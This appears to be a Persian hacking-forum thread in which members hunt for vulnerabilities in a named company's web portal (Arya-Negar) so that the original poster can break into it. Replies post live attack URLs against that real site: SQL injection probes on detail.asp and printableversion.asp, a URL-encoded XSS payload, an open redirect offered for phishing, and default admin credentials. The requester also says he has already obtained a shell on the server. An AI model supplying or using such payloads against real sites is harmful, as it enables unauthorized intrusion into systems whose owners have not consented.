اطلاعیه

Collapse
No announcement yet.

باگ در پورتال اريانيک؟

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • باگ در پورتال اريانيک؟

    سلام خسته نباشيد شايد اين پست رو نبايد مي دادم اينجا اما کارم گير کرد مجبور شدم از دوستان يک کمکي بگيرم
    از دوستان کسي روي پورتال شرکت اريانيک باگ داره؟ www.arya-negar.com/site/
    اگر کسي چيزي داره ممنون ميشم يا پيغام خصوصي کنه يا اينجا بزاره حتي يک اسکيول اينجکشن کوچيک هم باشه کافي هست واسم ممنون
    ساسان
    آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

  • #2
    sql injection?????

    کد PHP:
    http://www.arya-negar.com/site/detail.asp?page=5&id=' 
    همه مان یک روز بالاخره بر سر این دوراهی خواهیم ایستاد …
    آنجا که همسرمان خواهد گفت : ” یا من ، یا اینترنت ؟! “
    و چه لحظه ی سختی خواهد بود ،
    لحظه جدایی از همسر … !

    Comment


    • #3
      نه اين اينجکت نيست !!! از شما ديگه بعيده اگر يکم تست کنيد مي بينيد که فقط همين ارور و يک ارور ديگه مي ده و توي تمام اونها id هست!! الان حوصله توضيح بيشتر ندارم (ساده گفتم ) اگر تونستيد با اين کاري کنيد هم ممنون ميشم بهم خبر بديد
      آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

      Comment


      • #4
        راستش منم روش کار کردم اما چیزی به عنوان Sql Injectتوش ندیدم تو تمام ای دی ها فقط یه ارور رو میده

        Comment


        • #5
          سلام آقا ساسان
          من تنها چیزی که از این پورتال پیدا کردم اینه که یک پسورد پیش فرض داره که شاید تو بعضی سایتها کار کنه ادرس صفحه ادمینش هم پایین هست
          مثال
          http://www.yourdoamin.com/site/admin/login.asp
          user:admin
          pass:admin

          Comment


          • #6
            سلام
            ببينيد اون يوزر پسورد ديفالت رو من تست کردم جواب نميده نکته جالب تر اين هست که اگر يوزر يا پسورد اشتباه باشه ذکر مي کنه مثلا مي گه کلمه عبور اشتباه است يا نام کاربري اشتباه است
            کسه ديگه اي نبود
            آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

            Comment


            • #7
              نوشته اصلی توسط 4shir نمایش پست ها
              نه اين اينجکت نيست !!! از شما ديگه بعيده اگر يکم تست کنيد مي بينيد که فقط همين ارور و يک ارور ديگه مي ده و توي تمام اونها id هست!! الان حوصله توضيح بيشتر ندارم (ساده گفتم ) اگر تونستيد با اين کاري کنيد هم ممنون ميشم بهم خبر بديد
              والا راستشو بخوای تست نکردم ساسان جان ولی اولین چیزی که دیدم همین بود. حالا سر فرصت روش کار میکنیم
              همه مان یک روز بالاخره بر سر این دوراهی خواهیم ایستاد …
              آنجا که همسرمان خواهد گفت : ” یا من ، یا اینترنت ؟! “
              و چه لحظه ی سختی خواهد بود ،
              لحظه جدایی از همسر … !

              Comment


              • #8
                xss bug:
                کد:
                http://negar.domain-panel.org/site/search.asp?q=%22%3E%3C******%3Ealert%28%27xss%27%29%3B%3C%2F******%3E&page=3
                http://r3dm0v3.persianblog.ir
                http://facebook.com/r3dm0v3

                Comment


                • #9
                  redirect, phishing bug:
                  کد:
                  http://www.arya-negar.com/site/gotolink.asp?site=http://www.shabgard.org
                  http://r3dm0v3.persianblog.ir
                  http://facebook.com/r3dm0v3

                  Comment


                  • #10
                    به نظر میرسه تو ادرسه زیر بشه انجکشن کرد:
                    کد:
                    http://negar.domain-panel.org/site/printableversion.asp?id=100+or+2=2
                    با باز کردن ادرس بالا اولین ایتم در دیتابیس (یعنی id=1) رو نشون میده که نشونه ی آسیب پذیر بودنشه.
                    بقیش با خودتون.
                    http://r3dm0v3.persianblog.ir
                    http://facebook.com/r3dm0v3

                    Comment


                    • #11
                      سلام دست همه درد نکنه من روي اين اينجکت کار کردم اما جواب خاصي نگرفتم !!
                      شايد من بد عمل کردم اما در هر صورت نشد !!
                      اون xss رو هم متشکر اما باگ مي خوام که بزنم سيستم رو من تونستم شل بگيرم از سرور اما هيچ کاري نميشه کرد خيلي خوب کانفيگ کردن
                      آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

                      Comment

                      Working...
                      X